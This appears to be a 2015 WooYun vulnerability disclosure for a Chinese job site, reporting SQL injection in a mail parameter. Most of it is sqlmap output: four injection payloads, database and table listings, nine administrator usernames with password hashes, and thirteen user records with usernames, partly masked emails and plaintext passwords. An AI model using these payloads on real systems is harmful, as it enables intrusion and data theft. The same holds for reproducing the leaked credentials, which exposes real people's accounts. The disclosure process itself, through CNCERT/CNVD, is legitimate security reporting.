当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141163

漏洞标题:好人才网主站SQL注入漏洞DBA权限/13W用户信息)

相关厂商:好人才

漏洞作者: 路人甲

提交时间:2015-09-17 09:04

修复时间:2015-11-03 18:32

公开时间:2015-11-03 18:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-29: 细节向核心白帽子及相关领域专家公开
2015-10-09: 细节向普通白帽子公开
2015-10-19: 细节向实习白帽子公开
2015-11-03: 细节向公众公开

简要描述:

好人才网主站SQL注入漏洞,泄露13W 左右的用户注册信息(DBA权限)

详细说明:

注入点:http://**.**.**.**/ajax/mail.asp?mail=
检测发现是DBA 权限。。。。直接SQLMAP 跑下。。。。
发现多达13W 左右的用户注册量
Database: haorencai
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.hrc_all_user | 130987 |
+------------------+---------+

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: mail
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mail=' AND 5701=5701 AND 'nMdb'='nMdb
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: mail=' AND 6100=CONVERT(INT,(CHAR(58) CHAR(105) CHAR(110) CHAR(114)
 CHAR(58) (SELECT (CASE WHEN (6100=6100) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(
58) CHAR(122) CHAR(104) CHAR(114) CHAR(58))) AND 'moZm'='moZm
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: mail='; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: mail=' WAITFOR DELAY '0:0:5'--
---
[19:56:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[19:56:39] [INFO] fetching database names
[19:56:40] [INFO] heuristics detected web page charset 'GB2312'
[19:56:40] [INFO] the SQL query used returns 13 entries
available databases [13]:
[*] 1tian1ge
[*] hanshan-oa
[*] haorencai
[*] haorencai-20110809
[*] hsd-v2
[*] htj-oa
[*] hxa_oa
[*] korea_hospital
[*] master
[*] model
[*] msdb
[*] oa-yt
[*] tempdb
current database:    'haorencai'
current user:    'haorencai-db'
Database: haorencai
[45 tables]
+-------------------------------+
| haorencai-db.hrc_pos_view     |
| haorencai-db.hrc_store_resume |
| dtproperties                  |
| hrc_ad_company                |
| hrc_ad_personal               |
| hrc_ad_phone                  |
| hrc_adv                       |
| hrc_advice                    |
| hrc_all_user                  |
| hrc_area                      |
| hrc_career_keyword            |
| hrc_collect_position          |
| hrc_collect_resume            |
| hrc_com_base                  |
| hrc_com_pay                   |
| hrc_com_position              |
| hrc_comment                   |
| hrc_document                  |
| hrc_job_keyword               |
| hrc_link                      |
| hrc_manage                    |
| hrc_messenger                 |
| hrc_notice                    |
| hrc_per_base                  |
| hrc_per_cert                  |
| hrc_per_disp                  |
| hrc_per_edus                  |
| hrc_per_exp                   |
| hrc_per_lang                  |
| hrc_per_pay                   |
| hrc_per_phone                 |
| hrc_per_train                 |
| hrc_quick_base                |
| hrc_quick_classify            |
| hrc_report                    |
| hrc_resume_visited            |
| hrc_send_resume               |
| hsd_attractions               |
| hsd_city                      |
| hsd_comment                   |
| hsd_driver                    |
| hsd_keyword                   |
| sungsin_job                   |
| sysconstraints                |
| syssegments                   |
+-------------------------------+


2.png


3.png


3.png


4.png


漏洞证明:

发现用户的密码是明文 醉了
另外管理员账号和密码也泄露了。。。。

Database: haorencai
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| dbo.hrc_messenger | 21388   |
+-------------------+---------+
[20:20:59] [INFO] retrieved: 82034
Database: haorencai
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| dbo.hrc_ad_personal | 82034   |
+---------------------+---------+
13万注册用户信息,其中包括账号和密码 邮箱等  并且竟然都是明文  醉了。。。。
Database: haorencai
Table: hrc_all_user
[12 columns]
+-------------+---------------+
| Column      | Type          |
+-------------+---------------+
| acceptEmail | bit           |
| add_date    | smalldatetime |
| autoid      | int           |
| from_do     | varchar       |
| log_hits    | smallint      |
| send_date   | smalldatetime |
| send_date2  | smalldatetime |
| up_date     | smalldatetime |
| user_id     | varchar       |
| user_mail   | varchar       |
| user_pass   | varchar       |
| user_type   | tinyint       |
+-------------+---------------+
Database: haorencai
Table: hrc_manage
[5 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| ad_name  | varchar |
| ad_pass  | varchar |
| ad_power | varchar |
| ad_role  | int     |
| id       | int     |
+----------+---------+
Database: haorencai
Table: hrc_manage
[9 entries]
+-----------+------------------+---------------------------+
| ad_name   | ad_pass          | ad_power                  |
+-----------+------------------+---------------------------+
| aileen    | cc2bdf6614f728e2 | 0,1,2,3,4,5,6,7,8         |
| apple42   | 90721aa2c76b2d48 | 0,1,2,3,4,5,6,7,8,9,11    |
| arch      | a5d420fbc2491416 | 0,1,2,3,4,5,6,7,8,9,10,11 |
| chm726    | d01b294f3b53dd10 | 0,1,2,3,4,5,6,7,8,9,10,11 |
| clzheng   | cebc5cc990e471a0 | 0                         |
| happyds33 | aec399df03c6dde1 | 0,1,2,3,4,5,6,7,8,9,11    |
| jinsudo   | a8a22c569110997e | 0,1,2,3,4,5,6,7,8,9,10,11 |
| lishuo    | 9f413d19e73fc1cf | 0,1,2,3,4,5,6,8           |
| sff       | 3608acabbcaac14b | 0,1,2,3,4,5,6,11          |
+-----------+------------------+---------------------------+
Database: haorencai
Table: hrc_all_user
[13 entries]
+--------+------------+---------+--------------------+--------------------+----------+-----------+---------------------------+--------------------+------------+--------------------+-------------+
| autoid | user_id    | user_mail                 |  user_pass  
+--------+------------+---------+--------------------+--------------------+----------+-----------+---------------------------+--------------------+------------+--------------------+-------------+
| 100    | ab120      | tingting1984118@**.**.**.**   | | 1984118    
| 1000   | limei1212  |  limei-1212@**.**.**.**    |  9172002   
| 10000  | weilin123  |  weifei11@**.**.**.**      | 123123    
| 100000 | youchenkst | zhuxiang0450@**.**.**.** | 521025   
| 100001 | 2浪神         272897483@**.**.**.**          wkx1988210
| 100002 | wsszera    | 871934416@**.**.**.**          | 60551519 
| 100003 | wsszeraa   | 469609582@**.**.**.**          | 60551519  
| 100004 | woaimeng   | 1065607654@**.**.**.**         | 1524709312
| 100005 | qingti     |qingting52020@**.**.**.** | 110110    
| 100006 | danjie1    |  1481428961@**.**.**.**         |  269967557 
| 100007 | wangyasong | 328436718@**.**.**.**>         | 328436718 
| 100008 | h7875234   | xiaohua80231314@**.**.**.**  | 7875234    
| 100009 | 1835240830 |  343827025@**.**.**.**          | 
+--------+------------+---------+--------------------+----------


5.png


6.png


7.png


修复方案:

你们比较专业。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-09-19 18:30

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无